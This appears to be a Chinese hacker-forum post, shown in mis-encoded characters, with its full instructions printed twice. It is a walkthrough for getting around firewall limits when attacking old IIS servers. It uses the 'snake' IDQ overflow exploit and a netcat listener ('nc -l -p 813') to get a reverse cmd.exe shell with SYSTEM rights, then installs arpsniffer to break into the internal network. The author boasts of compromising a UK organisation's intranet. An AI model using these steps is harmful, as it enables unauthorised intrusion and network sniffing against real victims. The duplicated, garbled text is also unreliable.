大家在搞unicode的時候有沒有發(fā)現(xiàn)有時會tftp失敗,說是對方主機(jī)強(qiáng)制關(guān)閉了一個遠(yuǎn)程連接,這種情況一般是對方管理員作了tcp/ip限制或者安了防火墻的緣故,我昨天經(jīng)過試驗(yàn),找到了一種突破這種限制的方法
工具:snake的idq溢出(要00016版的) nc.exe(必備)
過程:
1、如果你有自己的ip,就在cmd窗口里切換到nc的目錄,輸入
nc -l -p 813
這條命令的意思是打開813端口接收連接,端口可以自己改,不過下面的813也要改成你改的端口
2、在idq溢出程序里選那個溢出成功后主動連接到
ip填自己的,端口是813
3、如果cmd窗口里出現(xiàn)了對方的目錄,那你就成功了
把idq溢出程序里的綁定命令改成cmd.exe,再溢出一次就可以了
4、這樣,你就輕松得到了對方主機(jī)的system權(quán)限。
5、這樣的機(jī)子一般有一定的背景,安個arpsniffer,接著開始滲透攻擊,看看能不能控制內(nèi)網(wǎng)。(我昨天搞的那臺英國的內(nèi)網(wǎng)實(shí)在是不小,哈哈)。滲透攻擊下次再說吧
因?yàn)閡nicode的主機(jī)最多也就是sp2,所以盡管溢出,溢出程序可以支持到sp2,不過不排除對方刪除isapi映射的可能性
工具:snake的idq溢出(要00016版的) nc.exe(必備)
過程:
1、如果你有自己的ip,就在cmd窗口里切換到nc的目錄,輸入
nc -l -p 813
這條命令的意思是打開813端口接收連接,端口可以自己改,不過下面的813也要改成你改的端口
2、在idq溢出程序里選那個溢出成功后主動連接到
ip填自己的,端口是813
3、如果cmd窗口里出現(xiàn)了對方的目錄,那你就成功了
把idq溢出程序里的綁定命令改成cmd.exe,再溢出一次就可以了
4、這樣,你就輕松得到了對方主機(jī)的system權(quán)限。
5、這樣的機(jī)子一般有一定的背景,安個arpsniffer,接著開始滲透攻擊,看看能不能控制內(nèi)網(wǎng)。(我昨天搞的那臺英國的內(nèi)網(wǎng)實(shí)在是不小,哈哈)。滲透攻擊下次再說吧
因?yàn)閡nicode的主機(jī)最多也就是sp2,所以盡管溢出,溢出程序可以支持到sp2,不過不排除對方刪除isapi映射的可能性